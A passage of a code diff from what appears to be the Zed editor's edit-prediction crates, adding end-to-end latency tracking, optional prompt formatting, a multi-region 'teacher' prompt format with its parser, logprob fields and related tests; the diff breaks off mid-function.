- let response_received_at = Instant::now();
if !response.status().is_success() {
let message = format!(
"Request failed with status: {:?}\nBody: {}",
@@ -289,19 +286,13 @@ impl SweepAi {
})
.collect::<Vec<_>>();
- anyhow::Ok((
- response.autocomplete_id,
- edits,
- inputs.snapshot,
- response_received_at,
- ep_inputs,
- ))
+ anyhow::Ok((response.autocomplete_id, edits, inputs.snapshot, ep_inputs))
});
let buffer = inputs.buffer.clone();
cx.spawn(async move |cx| {
- let (id, edits, old_snapshot, response_received_at, inputs) = result.await?;
+ let (id, edits, old_snapshot, inputs) = result.await?;
anyhow::Ok(Some(
EditPredictionResult::new(
EditPredictionId(id.into()),
@@ -309,10 +300,9 @@ impl SweepAi {
&old_snapshot,
edits.into(),
None,
- buffer_snapshotted_at,
- response_received_at,
inputs,
None,
+ cx.background_executor().now() - request_start,
cx,
)
.await,
@@ -22,7 +22,7 @@ use ui::SharedString;
use workspace::notifications::{ErrorMessagePrompt, NotificationId, show_app_notification};
use zeta_prompt::{ParsedOutput, ZetaPromptInput};
-use std::{env, ops::Range, path::Path, sync::Arc, time::Instant};
+use std::{env, ops::Range, path::Path, sync::Arc};
use zeta_prompt::{
CURSOR_MARKER, ZetaFormat, format_zeta_prompt, get_prefill, parse_zeta2_model_output,
prompt_input_contains_special_tokens, stop_tokens_for_format,
@@ -63,7 +63,7 @@ pub fn request_prediction_with_zeta(
};
let http_client = cx.http_client();
- let buffer_snapshotted_at = Instant::now();
+ let request_start = cx.background_executor().now();
let raw_config = store.zeta2_raw_config().cloned();
let preferred_experiment = store.preferred_experiment().map(|s| s.to_owned());
let open_ai_compatible_api_key = load_open_ai_compatible_api_key_if_needed(provider, cx);
@@ -100,7 +100,6 @@ pub fn request_prediction_with_zeta(
snapshot: BufferSnapshot,
edits: Vec<(Range<Anchor>, Arc<str>)>,
cursor_position: Option<PredictedCursorPosition>,
- received_response_at: Instant,
editable_range_in_buffer: Range<usize>,
model_version: Option<String>,
}
@@ -130,13 +129,14 @@ pub fn request_prediction_with_zeta(
return Err(anyhow::anyhow!("prompt contains special tokens"));
}
+ let formatted_prompt = format_zeta_prompt(&prompt_input, zeta_version);
+
if let Some(debug_tx) = &debug_tx {
- let prompt = format_zeta_prompt(&prompt_input, zeta_version);
debug_tx
.unbounded_send(DebugEvent::EditPredictionStarted(
EditPredictionStartedDebugEvent {
buffer: buffer.downgrade(),
- prompt: Some(prompt),
+ prompt: formatted_prompt.clone(),
position,
},
))
@@ -145,11 +145,11 @@ pub fn request_prediction_with_zeta(
log::trace!("Sending edit prediction request");
- let (request_id, output, model_version, usage) =
- if let Some(custom_settings) = &custom_server_settings {
+ let Some((request_id, output, model_version, usage)) =
+ (if let Some(custom_settings) = &custom_server_settings {
let max_tokens = custom_settings.max_output_tokens * 4;
- match custom_settings.prompt_format {
+ Some(match custom_settings.prompt_format {
EditPredictionPromptFormat::Zeta => {
let ranges = &prompt_input.excerpt_ranges;
let editable_range_in_excerpt = ranges.editable_350.clone();
@@ -186,7 +186,9 @@ pub fn request_prediction_with_zeta(
(request_id, parsed_output, None, None)
}
EditPredictionPromptFormat::Zeta2 => {
- let prompt = format_zeta_prompt(&prompt_input, zeta_version);
+ let Some(prompt) = formatted_prompt.clone() else {
+ return Ok((None, None));
+ };
let prefill = get_prefill(&prompt_input, zeta_version);
let prompt = format!("{prompt}{prefill}");
@@ -219,9 +221,11 @@ pub fn request_prediction_with_zeta(
(request_id, output_text, None, None)
}
_ => anyhow::bail!("unsupported prompt format"),
- }
+ })
} else if let Some(config) = &raw_config {
- let prompt = format_zeta_prompt(&prompt_input, config.format);
+ let Some(prompt) = format_zeta_prompt(&prompt_input, config.format) else {
+ return Ok((None, None));
+ };
let prefill = get_prefill(&prompt_input, config.format);
let prompt = format!("{prompt}{prefill}");
let environment = config
@@ -263,7 +267,7 @@ pub fn request_prediction_with_zeta(
None
};
- (request_id, output, None, usage)
+ Some((request_id, output, None, usage))
} else {
// Use V3 endpoint - server handles model/version selection and suffix stripping
let (response, usage) = EditPredictionStore::send_v3_request(
@@ -284,10 +288,11 @@ pub fn request_prediction_with_zeta(
range_in_excerpt: response.editable_range,
};
- (request_id, Some(parsed_output), model_version, usage)
- };
-
- let received_response_at = Instant::now();
+ Some((request_id, Some(parsed_output), model_version, usage))
+ })
+ else {
+ return Ok((None, None));
+ };
log::trace!("Got edit prediction response");
@@ -296,7 +301,7 @@ pub fn request_prediction_with_zeta(
range_in_excerpt: editable_range_in_excerpt,
}) = output
else {
- return Ok(((request_id, None), None));
+ return Ok((Some((request_id, None)), None));
};
let editable_range_in_buffer = editable_range_in_excerpt.start
@@ -342,7 +347,7 @@ pub fn request_prediction_with_zeta(
);
anyhow::Ok((
- (
+ Some((
request_id,
Some(Prediction {
prompt_input,
@@ -350,18 +355,20 @@ pub fn request_prediction_with_zeta(
snapshot: snapshot.clone(),
edits,
cursor_position,
- received_response_at,
editable_range_in_buffer,
model_version,
}),
- ),
+ )),
usage,
))
}
});
cx.spawn(async move |this, cx| {
- let (id, prediction) = handle_api_response(&this, request_task.await, cx)?;
+ let Some((id, prediction)) = handle_api_response(&this, request_task.await, cx)? else {
+ return Ok(None);
+ };
+ let request_duration = cx.background_executor().now() - request_start;
let Some(Prediction {
prompt_input: inputs,
@@ -369,13 +376,13 @@ pub fn request_prediction_with_zeta(
snapshot: edited_buffer_snapshot,
edits,
cursor_position,
- received_response_at,
editable_range_in_buffer,
model_version,
}) = prediction
else {
return Ok(Some(EditPredictionResult {
id,
+ e2e_latency: request_duration,
prediction: Err(EditPredictionRejectReason::Empty),
}));
};
@@ -413,6 +420,7 @@ pub fn request_prediction_with_zeta(
&edited_buffer_snapshot,
editable_range_in_buffer,
example_spec,
+ request_duration,
cx,
);
})
@@ -428,10 +436,9 @@ pub fn request_prediction_with_zeta(
&edited_buffer_snapshot,
edits.into(),
cursor_position,
- buffer_snapshotted_at,
- received_response_at,
inputs,
model_version,
+ request_duration,
cx,
)
.await,
@@ -580,6 +587,7 @@ pub(crate) fn edit_prediction_accepted(
let request_id = current_prediction.prediction.id.to_string();
let model_version = current_prediction.prediction.model_version;
+ let e2e_latency = current_prediction.e2e_latency;
let require_auth = custom_accept_url.is_none();
let client = store.client.clone();
let llm_token = store.llm_token.clone();
@@ -605,6 +613,7 @@ pub(crate) fn edit_prediction_accepted(
serde_json::to_string(&AcceptEditPredictionBody {
request_id: request_id.clone(),
model_version: model_version.clone(),
+ e2e_latency_ms: Some(e2e_latency.as_millis()),
})?
.into(),
);
@@ -21,6 +21,7 @@ clap = "4"
client.workspace = true
cloud_llm_client.workspace= true
collections.workspace = true
+db.workspace = true
debug_adapter_extension.workspace = true
dirs.workspace = true
extension.workspace = true
@@ -82,6 +82,10 @@ pub struct ExamplePrediction {
#[serde(default, skip_serializing_if = "Option::is_none")]
pub error: Option<String>,
pub provider: PredictionProvider,
+ #[serde(default, skip_serializing_if = "Option::is_none")]
+ pub cumulative_logprob: Option<f64>,
+ #[serde(default, skip_serializing_if = "Option::is_none")]
+ pub avg_logprob: Option<f64>,
}
#[derive(Clone, Debug, Serialize, Deserialize)]
@@ -166,6 +170,10 @@ pub struct ExampleScore {
pub inserted_tokens: usize,
#[serde(default)]
pub deleted_tokens: usize,
+ #[serde(default, skip_serializing_if = "Option::is_none")]
+ pub cumulative_logprob: Option<f64>,
+ #[serde(default, skip_serializing_if = "Option::is_none")]
+ pub avg_logprob: Option<f64>,
}
impl Example {
@@ -13,7 +13,7 @@ use std::ops::Range;
use std::sync::Arc;
use zeta_prompt::{
ZetaFormat, encode_patch_as_output_for_format, excerpt_range_for_format, format_zeta_prompt,
- output_end_marker_for_format, resolve_cursor_region,
+ multi_region, output_end_marker_for_format, resolve_cursor_region,
};
pub async fn run_format_prompt(
@@ -49,6 +49,24 @@ pub async fn run_format_prompt(
provider: args.provider,
});
}
+ PredictionProvider::TeacherMultiRegion(_)
+ | PredictionProvider::TeacherMultiRegionNonBatching(_) => {
+ step_progress.set_substatus("formatting teacher multi-region prompt");
+
+ let zeta_format = ZetaFormat::default();
+ let (editable_range, context_range) =
+ excerpt_range_for_format(zeta_format, &prompt_inputs.excerpt_ranges);
+
+ let prompt =
+ TeacherMultiRegionPrompt::format_prompt(example, editable_range, context_range);
+ example.prompt = Some(ExamplePrompt {
+ input: prompt,
+ expected_output: String::new(),
+ rejected_output: None,
+ prefill: None,
+ provider: args.provider,
+ });
+ }
PredictionProvider::Zeta2(zeta_format) => {
step_progress.set_substatus("formatting zeta2 prompt");
@@ -74,7 +92,7 @@ pub async fn run_format_prompt(
zeta2_output_for_patch(prompt_inputs, patch, None, zeta_format).ok()
});
- example.prompt = Some(ExamplePrompt {
+ example.prompt = prompt.map(|prompt| ExamplePrompt {
input: prompt,
expected_output,
rejected_output,
@@ -108,7 +126,7 @@ pub fn zeta2_output_for_patch(
return Ok(encoded_output);
}
- let (mut result, first_hunk_offset) =
+ let (result, first_hunk_offset) =
udiff::apply_diff_to_string_with_hunk_offset(patch, &old_editable_region).with_context(
|| {
format!(
@@ -118,6 +136,64 @@ pub fn zeta2_output_for_patch(
},
)?;
+ if version == ZetaFormat::V0317SeedMultiRegions {
+ let cursor_in_new = cursor_offset.map(|cursor_offset| {
+ let hunk_start = first_hunk_offset.unwrap_or(0);
+ result.floor_char_boundary((hunk_start + cursor_offset).min(result.len()))
+ });
+ return multi_region::encode_from_old_and_new_v0317(
+ &old_editable_region,
+ &result,
+ cursor_in_new,
+ zeta_prompt::CURSOR_MARKER,
+ multi_region::V0317_END_MARKER,
+ );
+ }
+
+ if version == ZetaFormat::V0318SeedMultiRegions {
+ let cursor_in_new = cursor_offset.map(|cursor_offset| {
+ let hunk_start = first_hunk_offset.unwrap_or(0);
+ result.floor_char_boundary((hunk_start + cursor_offset).min(result.len()))
+ });
+ return multi_region::encode_from_old_and_new_v0318(
+ &old_editable_region,
+ &result,
+ cursor_in_new,
+ zeta_prompt::CURSOR_MARKER,
+ multi_region::V0318_END_MARKER,
+ );
+ }
+
+ if version == ZetaFormat::V0316SeedMultiRegions {
+ let cursor_in_new = cursor_offset.map(|cursor_offset| {
+ let hunk_start = first_hunk_offset.unwrap_or(0);
+ result.floor_char_boundary((hunk_start + cursor_offset).min(result.len()))
+ });
+ return multi_region::encode_from_old_and_new_v0316(
+ &old_editable_region,
+ &result,
+ cursor_in_new,
+ zeta_prompt::CURSOR_MARKER,
+ multi_region::V0316_END_MARKER,
+ );
+ }
+
+ if version == ZetaFormat::V0306SeedMultiRegions {
+ let cursor_in_new = cursor_offset.map(|cursor_offset| {
+ let hunk_start = first_hunk_offset.unwrap_or(0);
+ result.floor_char_boundary((hunk_start + cursor_offset).min(result.len()))
+ });
+ return multi_region::encode_from_old_and_new(
+ &old_editable_region,
+ &result,
+ cursor_in_new,
+ zeta_prompt::CURSOR_MARKER,
+ zeta_prompt::seed_coder::END_MARKER,
+ zeta_prompt::seed_coder::NO_EDITS,
+ );
+ }
+
+ let mut result = result;
if let Some(cursor_offset) = cursor_offset {
// The cursor_offset is relative to the start of the hunk's new text (context + additions).
// We need to add where the hunk context matched in the editable region to compute
@@ -175,7 +251,10 @@ impl TeacherPrompt {
}
}
- if response.trim().ends_with(Self::NO_EDITS) {
+ if response
+ .trim_end_matches(&[' ', '\n', '`'])
+ .ends_with(Self::NO_EDITS)
+ {
return Ok(no_edits);
}
@@ -211,7 +290,6 @@ impl TeacherPrompt {
.context("editable region not found in prompt content")?;
let editable_region_start_line = excerpt[..editable_region_offset].matches('\n').count();
- // Use full context so cursor offset (relative to editable region start) aligns with diff content
let editable_region_lines = old_editable_region.lines().count() as u32;
let diff = language::unified_diff_with_context(
&old_editable_region,
@@ -263,6 +341,7 @@ impl TeacherPrompt {
.prompt_inputs
.as_ref()
.and_then(|pi| pi.related_files.as_deref());
+
let Some(related_files) = related_files else {
return "(No context)".to_string();
};
@@ -317,6 +396,202 @@ impl TeacherPrompt {
}
}
+pub struct TeacherMultiRegionPrompt;
+
+impl TeacherMultiRegionPrompt {
+ pub(crate) const USER_CURSOR_MARKER: &str = "<|user_cursor|>";
+ pub(crate) const NO_EDITS: &str = "NO_EDITS";
+
+ /// Truncate edit history to this number of last lines
+ const MAX_HISTORY_LINES: usize = 128;
+
+ pub fn format_prompt(
+ example: &Example,
+ editable_range: Range<usize>,
+ context_range: Range<usize>,
+ ) -> String {
+ let edit_history = Self::format_edit_history(&example.spec.edit_history);
+ let context = Self::format_context(example);
+ let cursor_excerpt = Self::format_cursor_excerpt(example, editable_range, context_range);
+
+ let prompt_template = crate::prompt_assets::get_prompt("teacher_multi_region.md");
+ let prompt = prompt_template
+ .replace("{{context}}", &context)
+ .replace("{{edit_history}}", &edit_history)
+ .replace("{{cursor_excerpt}}", &cursor_excerpt);
+
+ prompt
+ }
+
+ pub fn parse(example: &Example, response: &str) -> Result<(String, Option<ActualCursor>)> {
+ let no_edits = (String::new(), None);
+ if let Some(last_codeblock) = extract_last_codeblock(&response) {
+ if last_codeblock.trim() == Self::NO_EDITS {
+ return Ok(no_edits);
+ }
+ }
+
+ if response.trim().ends_with(Self::NO_EDITS) {
+ return Ok(no_edits);
+ }
+
+ let prompt_inputs = example
+ .prompt_inputs
+ .as_ref()
+ .context("example is missing prompt inputs")?;
+
+ let zeta_format = ZetaFormat::default();
+ let (editable_range, _) =
+ excerpt_range_for_format(zeta_format, &prompt_inputs.excerpt_ranges);
+ let excerpt = prompt_inputs.cursor_excerpt.as_ref();
+ let old_editable_region = &excerpt[editable_range.clone()];
+ let marker_offsets = multi_region::compute_marker_offsets(old_editable_region);
+
+ let codeblock =
+ extract_last_codeblock(&response).context("no codeblock found in model response")?;
+ let (start_num, end_num, raw_new_span) = multi_region::extract_marker_span(&codeblock)?;
+
+ let start_idx = start_num
+ .checked_sub(1)
+ .context("marker numbers are 1-indexed")?;
+ let end_idx = end_num
+ .checked_sub(1)
+ .context("marker numbers are 1-indexed")?;
+ let start_byte = *marker_offsets
+ .get(start_idx)
+ .context("start marker number out of range")?;
+ let end_byte = *marker_offsets
+ .get(end_idx)
+ .context("end marker number out of range")?;
+
+ if start_byte > end_byte {
+ return Err(anyhow!("start marker must come before end marker"));
+ }
+
+ let cursor_in_span = raw_new_span.find(Self::USER_CURSOR_MARKER);
+ let new_span = raw_new_span.replace(Self::USER_CURSOR_MARKER, "");
+
+ let old_span = &old_editable_region[start_byte..end_byte];
+ let mut new_span = new_span;
+ if old_span.ends_with('\n') && !new_span.ends_with('\n') && !new_span.is_empty() {
+ new_span.push('\n');
+ }
+ if !old_span.ends_with('\n') && new_span.ends_with('\n') {
+ new_span.pop();
+ }
+
+ let mut new_editable_region = String::new();
+ new_editable_region.push_str(&old_editable_region[..start_byte]);
+ new_editable_region.push_str(&new_span);
+ new_editable_region.push_str(&old_editable_region[end_byte..]);
+
+ let cursor_offset = cursor_in_span.map(|pos| start_byte + pos);
+
+ if old_editable_region.starts_with('\n') && !new_editable_region.starts_with('\n') {
+ new_editable_region.insert(0, '\n');
+ }
+
+ let editable_region_offset = editable_range.start;
+ let editable_region_start_line = excerpt[..editable_region_offset].matches('\n').count();
+
+ let editable_region_lines = old_editable_region.lines().count() as u32;
+ let diff = language::unified_diff_with_context(
+ old_editable_region,
+ &new_editable_region,
+ editable_region_start_line as u32,
+ editable_region_start_line as u32,
+ editable_region_lines,
+ );
+
+ let diff = indoc::formatdoc! {"
+ --- a/{path}
+ +++ b/{path}
+ {diff}",
+ path = example.spec.cursor_path.to_string_lossy(),
+ diff = diff,
+ };
+
+ let actual_cursor = cursor_offset.map(|editable_region_cursor_offset| {
+ ActualCursor::from_editable_region(
+ &example.spec.cursor_path,
+ editable_region_cursor_offset,
+ &new_editable_region,
+ excerpt,
+ editable_region_offset,
+ editable_region_start_line,
+ )
+ });
+
+ Ok((diff, actual_cursor))
+ }
+
+ fn format_edit_history(edit_history: &str) -> String {
+ let lines: Vec<&str> = edit_history.lines().collect();
+
+ if lines.is_empty() {
+ return "(No edit history)".to_string();
+ }
+
+ if lines.len() > Self::MAX_HISTORY_LINES {
+ let truncated = lines[lines.len() - Self::MAX_HISTORY_LINES..].join("\n");
+ format!("{truncated}\n[...truncated...]")
+ } else {
+ lines.join("\n")
+ }
+ }
+
+ pub fn format_context(example: &Example) -> String {
+ let related_files = example
+ .prompt_inputs
+ .as_ref()
+ .and_then(|pi| pi.related_files.as_deref());
+ let Some(related_files) = related_files else {
+ return "(No context)".to_string();
+ };
+
+ if related_files.is_empty() {
+ return "(No context)".to_string();
+ }
+
+ let prefix = "`````";
+ let suffix = "`````\n\n";
+ let max_tokens = 1024;
+ zeta_prompt::format_related_files_within_budget(related_files, &prefix, &suffix, max_tokens)
+ }
+
+ fn format_cursor_excerpt(
+ example: &Example,
+ editable_range: Range<usize>,
+ context_range: Range<usize>,
+ ) -> String {
+ let mut result = String::new();
+
+ let prompt_inputs = example.prompt_inputs.as_ref().unwrap();
+ let excerpt = prompt_inputs.cursor_excerpt.as_ref();
+ let cursor_offset = prompt_inputs.cursor_offset_in_excerpt;
+
+ let editable_text = &excerpt[editable_range.clone()];
+ let cursor_in_editable = cursor_offset - editable_range.start;
+
+ let path_str = example.spec.cursor_path.to_string_lossy();
+ result.push_str(&format!("`````{path_str}\n"));
+
+ result.push_str(&excerpt[context_range.start..editable_range.start]);
+
+ multi_region::write_editable_with_markers(
+ &mut result,
+ editable_text,
+ cursor_in_editable,
+ Self::USER_CURSOR_MARKER,
+ );
+
+ result.push_str(&excerpt[editable_range.end..context_range.end]);
+ result.push_str("\n`````");
+
+ result
+ }
+}
+
/// Extract the cursor excerpt from an example.
/// First tries to extract from an existing prompt, then falls back to constructing from prompt_inputs.
pub fn extract_cursor_excerpt_from_example(example: &Example) -> Option<String> {
@@ -461,7 +736,7 @@ mod tests {
}
#[test]
- fn test_extract_editable_region() {
+ fn test_extract_editable_region_old_format() {
let text = indoc::indoc! {"
some lines
are
@@ -483,6 +758,38 @@ mod tests {
);
}
+ #[test]
+ fn test_extract_editable_region_marker_format() {
+ let text = indoc::indoc! {"
+ some context
+ <|marker_1|>
+ one
+ two three
+ <|marker_2|>
+ more context
+ "};
+ let parsed = multi_region::extract_editable_region_from_markers(text).unwrap();
+ assert_eq!(parsed, "one\ntwo three");
+ }
+
+ #[test]
+ fn test_extract_editable_region_multi_markers() {
+ let text = indoc::indoc! {"
+ prefix
+ <|marker_1|>
+ aaa
+ bbb
+ <|marker_2|>
+ ccc
+ ddd
+ <|marker_3|>
+ suffix
+ "};
+ let parsed = multi_region::extract_editable_region_from_markers(text).unwrap();
+ // Intermediate marker and its trailing \n are stripped
+ assert_eq!(parsed, "aaa\nbbb\nccc\nddd");
+ }
+
#[test]
fn test_extract_last_codeblock_nested_bibtex() {
let text = indoc::indoc! {r#"
@@ -582,4 +889,42 @@ mod tests {
let result = extract_last_codeblock(text).unwrap();
assert_eq!(result, "content here\n");
}
+
+ #[test]
+ fn test_parse_no_edits_response_with_trailing_backticks() {
+ let response = "NO_EDITS```";
+
+ let parsed = TeacherPrompt::parse(
+ &Example {
+ spec: edit_prediction::example_spec::ExampleSpec {
+ name: "test".to_string(),
+ repository_url: "https://github.com/zed-industries/zed.git".to_string(),
+ revision: "HEAD".to_string(),
+ tags: Vec::new(),
+ reasoning: None,
+ uncommitted_diff: String::new(),
+ cursor_path: std::sync::Arc::from(std::path::Path::new("src/main.rs")),
+ cursor_position: "0:0".to_string(),
+ edit_history: String::new(),
+ expected_patches: Vec::new(),
+ rejected_patch: None,
+ telemetry: None,
+ human_feedback: Vec::new(),
+ rating: None,
+ },
+ prompt_inputs: None,
+ prompt: None,
+ predictions: Vec::new(),
+ score: Vec::new(),
+ qa: Vec::new(),
+ zed_version: None,
+ state: None,
+ },
+ response,
+ )
+ .unwrap();
+
+ assert!(parsed.0.is_empty());
+ assert!(parsed.1.is_none());
+ }
}
@@ -1,4 +1,5 @@
use client::{Client, ProxySettings, UserStore};
+use db::AppDatabase;
use extension::ExtensionHostProxy;
use fs::RealFs;
use gpui::http_client::read_proxy_from_env;
@@ -61,6 +62,9 @@ pub fn init(cx: &mut App) -> EpAppState {
let client = Client::production(cx);
cx.set_http_client(client.http_client());
+ let app_db = AppDatabase::new();
+ cx.set_global(app_db);
+
let git_binary_path = None;
let fs = Arc::new(RealFs::new(
git_binary_path,
@@ -360,7 +360,9 @@ enum PredictionProvider {
Zeta2(ZetaFormat),
Baseten(ZetaFormat),
Teacher(TeacherBackend),
+ TeacherMultiRegion(TeacherBackend),
TeacherNonBatching(TeacherBackend),
+ TeacherMultiRegionNonBatching(TeacherBackend),
Repair,
}
@@ -379,9 +381,15 @@ impl std::fmt::Display for PredictionProvider {
PredictionProvider::Zeta2(format) => write!(f, "zeta2:{format}"),
PredictionProvider::Baseten(format) => write!(f, "baseten:{format}"),
PredictionProvider::Teacher(backend) => write!(f, "teacher:{backend}"),
+ PredictionProvider::TeacherMultiRegion(backend) => {
+ write!(f, "teacher-multi-region:{backend}")
+ }
PredictionProvider::TeacherNonBatching(backend) => {
write!(f, "teacher-non-batching:{backend}")
}
+ PredictionProvider::TeacherMultiRegionNonBatching(backend) => {
+ write!(f, "teacher-multi-region-non-batching:{backend}")
+ }
PredictionProvider::Repair => write!(f, "repair"),
}
}
@@ -409,13 +417,27 @@ impl std::str::FromStr for PredictionProvider {
.unwrap_or(TeacherBackend::default());
Ok(PredictionProvider::Teacher(backend))
}
- "teacher-non-batching" | "teacher_non_batching" | "teachernonbatching" => {
+ "teacher-multi-region" | "teacher_multi_region" => {
+ let backend = arg
+ .map(|a| a.parse())
+ .transpose()?
+ .unwrap_or(TeacherBackend::default());
+ Ok(PredictionProvider::TeacherMultiRegion(backend))
+ }
+ "teacher-non-batching" | "teacher_non_batching" => {
let backend = arg
.map(|a| a.parse())
.transpose()?
.unwrap_or(TeacherBackend::default());
Ok(PredictionProvider::TeacherNonBatching(backend))
}
+ "teacher-multi-region-non-batching" | "teacher_multi_region_non_batching" => {
+ let backend = arg
+ .map(|a| a.parse())
+ .transpose()?
+ .unwrap_or(TeacherBackend::default());
+ Ok(PredictionProvider::TeacherMultiRegionNonBatching(backend))
+ }
"repair" => Ok(PredictionProvider::Repair),
"baseten" => {
let format = arg
@@ -426,9 +448,9 @@ impl std::str::FromStr for PredictionProvider {
}
_ => {
anyhow::bail!(
- "unknown provider `{provider}`. Valid options: sweep, mercury, zeta1, zeta2, zeta2:<version>, teacher, teacher:<backend>, teacher-non-batching, repair\n\
+ "unknown provider `{provider}`. Valid options: sweep, mercury, zeta1, zeta2, zeta2:<version>, teacher, teacher:<backend>, teacher-multi-region, teacher-multi-region:<backend>, teacher-non-batching, teacher-multi-region-non-batching, repair\n\
For zeta2, you can optionally specify a version like `zeta2:ordered` or `zeta2:V0113_Ordered`.\n\
- For teacher, you can specify a backend like `teacher:sonnet46` or `teacher:gpt52`.\n\
+ For teacher providers, you can specify a backend like `teacher:sonnet46`, `teacher-multi-region:sonnet46`, `teacher-multi-region-non-batching:sonnet46`, or `teacher:gpt52`.\n\
Available zeta versions:\n{}",
ZetaFormat::options_as_string()
)
@@ -491,6 +513,40 @@ enum BatchProvider {
Openai,
}
+#[cfg(test)]
+mod tests {
+ use super::*;
+
+ #[test]
+ fn prediction_provider_multi_region_non_batched_round_trips_to_primary_spelling() {
+ let provider: PredictionProvider = "teacher-multi-region-non-batching:sonnet46"
+ .parse()
+ .unwrap();
+ assert_eq!(
+ provider,
+ PredictionProvider::TeacherMultiRegionNonBatching(TeacherBackend::Sonnet46)
+ );
+ assert_eq!(
+ provider.to_string(),
+ "teacher-multi-region-non-batching:sonnet46"
+ );
+ }
+
+ #[test]
+ fn prediction_provider_multi_region_non_batched_alias_round_trips_to_primary_spelling() {
+ let provider: PredictionProvider =
+ "teacher_multi_region_non_batching:gpt52".parse().unwrap();
+ assert_eq!(
+ provider,
+ PredictionProvider::TeacherMultiRegionNonBatching(TeacherBackend::Gpt52)
+ );
+ assert_eq!(
+ provider.to_string(),
+ "teacher-multi-region-non-batching:gpt52"
+ );
+ }
+}
+
impl EpArgs {
fn output_path(&self) -> Option<PathBuf> {
if self.in_place {
@@ -40,6 +40,7 @@ impl PlainOpenAiClient {
model: model.to_string(),
messages,
stream: false,
+ stream_options: None,
max_completion_tokens: Some(max_tokens),
stop: Vec::new(),
temperature: None,
@@ -490,6 +491,7 @@ impl BatchingOpenAiClient {
model: serializable_request.model,
messages,
stream: false,
+ stream_options: None,
max_completion_tokens: Some(serializable_request.max_tokens),
stop: Vec::new(),
temperature: None,
@@ -1,7 +1,7 @@
use crate::{
PredictionProvider,
example::{ActualCursor, Example},
- format_prompt::TeacherPrompt,
+ format_prompt::{TeacherMultiRegionPrompt, TeacherPrompt},
repair,
};
use anyhow::{Context as _, Result};
@@ -41,6 +41,10 @@ pub fn parse_prediction_output(
PredictionProvider::Teacher(_) | PredictionProvider::TeacherNonBatching(_) => {
TeacherPrompt::parse(example, actual_output)
}
+ PredictionProvider::TeacherMultiRegion(_)
+ | PredictionProvider::TeacherMultiRegionNonBatching(_) => {
+ TeacherMultiRegionPrompt::parse(example, actual_output)
+ }
PredictionProvider::Zeta2(version) => parse_zeta2_output(example, actual_output, version),
PredictionProvider::Repair => repair::parse(example, actual_output),
_ => anyhow::bail!(
@@ -2,7 +2,7 @@ use crate::{
FormatPromptArgs, PredictArgs, PredictionProvider, TeacherBackend,
anthropic_client::AnthropicClient,
example::{Example, ExamplePrediction, ExamplePrompt},
- format_prompt::{TeacherPrompt, run_format_prompt},
+ format_prompt::{TeacherMultiRegionPrompt, TeacherPrompt, run_format_prompt},
headless::EpAppState,
load_project::run_load_project,
openai_client::OpenAiClient,
@@ -57,8 +57,10 @@ pub async fn run_prediction(
);
};
- if let PredictionProvider::Teacher(backend) | PredictionProvider::TeacherNonBatching(backend) =
- provider
+ if let PredictionProvider::Teacher(backend)
+ | PredictionProvider::TeacherMultiRegion(backend)
+ | PredictionProvider::TeacherNonBatching(backend)
+ | PredictionProvider::TeacherMultiRegionNonBatching(backend) = provider
{
run_context_retrieval(example, app_state.clone(), example_progress, cx.clone()).await?;
run_format_prompt(
@@ -71,7 +73,10 @@ pub async fn run_prediction(
.await?;
let step_progress = example_progress.start(Step::Predict);
- let batched = matches!(provider, PredictionProvider::Teacher(..));
+ let batched = matches!(
+ provider,
+ PredictionProvider::Teacher(..) | PredictionProvider::TeacherMultiRegion(..)
+ );
return predict_teacher(
example,
backend,
@@ -135,7 +140,9 @@ pub async fn run_prediction(
PredictionProvider::Sweep => edit_prediction::EditPredictionModel::Sweep,
PredictionProvider::Mercury => edit_prediction::EditPredictionModel::Mercury,
PredictionProvider::Teacher(..)
+ | PredictionProvider::TeacherMultiRegion(..)
| PredictionProvider::TeacherNonBatching(..)
+ | PredictionProvider::TeacherMultiRegionNonBatching(..)
| PredictionProvider::Repair
| PredictionProvider::Baseten(_) => {
unreachable!()
@@ -256,6 +263,8 @@ pub async fn run_prediction(
actual_cursor: None,
error: None,
provider,
+ cumulative_logprob: None,
+ avg_logprob: None,
});
step_progress.set_substatus("requesting prediction");
@@ -403,7 +412,29 @@ async fn predict_anthropic(
.collect::<Vec<String>>()
.join("\n");
- let (actual_patch, actual_cursor) = TeacherPrompt::parse(example, &actual_output)?;
+ let parser_provider = if batched {
+ example
+ .prompt
+ .as_ref()
+ .map(|prompt| prompt.provider)
+ .unwrap_or(PredictionProvider::Teacher(backend))
+ } else {
+ match example.prompt.as_ref().map(|prompt| prompt.provider) {
+ Some(PredictionProvider::TeacherMultiRegion(_))
+ | Some(PredictionProvider::TeacherMultiRegionNonBatching(_)) => {
+ PredictionProvider::TeacherMultiRegionNonBatching(backend)
+ }
+ _ => PredictionProvider::TeacherNonBatching(backend),
+ }
+ };
+
+ let (actual_patch, actual_cursor) = match parser_provider {
+ PredictionProvider::TeacherMultiRegion(_)
+ | PredictionProvider::TeacherMultiRegionNonBatching(_) => {
+ TeacherMultiRegionPrompt::parse(example, &actual_output)?
+ }
+ _ => TeacherPrompt::parse(example, &actual_output)?,
+ };
let prediction = ExamplePrediction {
actual_patch: Some(actual_patch),
@@ -411,10 +442,23 @@ async fn predict_anthropic(
actual_cursor,
error: None,
provider: if batched {
- PredictionProvider::Teacher(backend)
+ match example.prompt.as_ref().map(|prompt| prompt.provider) {
+ Some(PredictionProvider::TeacherMultiRegion(_)) => {
+ PredictionProvider::TeacherMultiRegion(backend)
+ }
+ _ => PredictionProvider::Teacher(backend),
+ }
} else {
- PredictionProvider::TeacherNonBatching(backend)
+ match example.prompt.as_ref().map(|prompt| prompt.provider) {
+ Some(PredictionProvider::TeacherMultiRegion(_))
+ | Some(PredictionProvider::TeacherMultiRegionNonBatching(_)) => {
+ PredictionProvider::TeacherMultiRegionNonBatching(backend)
+ }
+ _ => PredictionProvider::TeacherNonBatching(backend),
+ }
},
+ cumulative_logprob: None,
+ avg_logprob: None,
};
example.predictions.push(prediction);
@@ -487,7 +531,29 @@ async fn predict_openai(
.collect::<Vec<String>>()
.join("\n");
- let (actual_patch, actual_cursor) = TeacherPrompt::parse(example, &actual_output)?;
+ let parser_provider = if batched {
+ example
+ .prompt
+ .as_ref()
+ .map(|prompt| prompt.provider)
+ .unwrap_or(PredictionProvider::Teacher(backend))
+ } else {
+ match example.prompt.as_ref().map(|prompt| prompt.provider) {
+ Some(PredictionProvider::TeacherMultiRegion(_))
+ | Some(PredictionProvider::TeacherMultiRegionNonBatching(_)) => {
+ PredictionProvider::TeacherMultiRegionNonBatching(backend)
+ }
+ _ => PredictionProvider::TeacherNonBatching(backend),
+ }
+ };
+
+ let (actual_patch, actual_cursor) = match parser_provider {
+ PredictionProvider::TeacherMultiRegion(_)
